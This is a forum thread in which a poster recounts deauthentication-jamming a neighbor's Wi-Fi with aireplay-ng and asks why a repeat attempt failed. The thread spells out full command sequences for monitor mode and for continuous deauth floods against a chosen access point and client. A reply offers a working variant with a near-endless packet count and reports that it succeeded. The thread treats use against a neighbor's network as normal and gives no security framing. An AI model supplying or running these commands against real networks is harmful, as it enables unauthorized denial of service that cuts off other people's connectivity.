    Default Wi-Fi Jamming with Aireplay-ng

A couple of years ago I was able to successfully "jam" a neighbor's computer from using Wi-Fi. I used the Backtrack tool aireplay-ng as well as some code from 2600 Magazine Volume 26 Issue 2 Page 18. The idea was to continuously inject deauthentication packets. After finding the Access Point MAC, client MAC, and channel, the code looked something like this:

    aireplay-ng -0 100 -a [BSSID] -c [client MAC] [wireless interface]

Which would send out 100 deauthentication packets to the client, effectively jamming the signal. We confirmed this by trying to get on Youtube and using the ping command, none of which worked properly. Recently however, I attempted to accomplish the same feat. I didn't have the code from the original attack so I had to reconfigure the process again. I found the Access Point MAC, the client MAC, the Access Point ESSID, and the channel used. I configured my wireless card to go to monitor mode, then locked the channel to 6. After that I ran the code successfully. However, this time I was not able to jam the signal. Does anyone know why?

    Here was what I used:
    # ifconfig wlan0 down
    # iwconfig wlan0 mode monitor
    # iwconfig wlan0 channel 6
    # ifconfig wlan0 up
    # aireplay-ng -0 100 -a [BSSID] -e [ESSID] -c [client MAC] [wireless interface]
With everything filled in correctly. The deauthentication packets were sent, but I was still able to surf Youtube on the victim computer.
By the way, I also noticed recently that the computer I have Backtrack installed on has been "Unable to Obtain IP address" when connecting to a wireless network. Would that affect the results?

hi i just tried and was succesful using the following method

    airmon-ng start wlan0
    airodump-ng -c (chanel) --bssid (bssid) mon0
    aireplay-ng --deauth 9999999999999999 -o 1 -a (BSSID) -e (ESSID) mon0

mon0 = (your virtual wireless interface used for moniter mode)
9999999999999 = how many times to send the deauthentication packet

    worked perfect.

    hope this helps

This is odd, my iPhone's wireless fails to work after this, but not my computer's(one not running backtrack).
